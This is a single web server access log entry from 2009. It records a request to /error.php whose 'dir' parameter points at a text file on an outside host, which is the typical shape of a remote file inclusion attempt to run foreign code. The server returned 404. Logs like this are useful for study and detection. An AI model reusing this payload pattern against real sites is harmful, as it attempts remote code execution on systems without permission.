70.87.64.234 - - [01/Dec/2009:08:35:09 -0800] "GET /error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
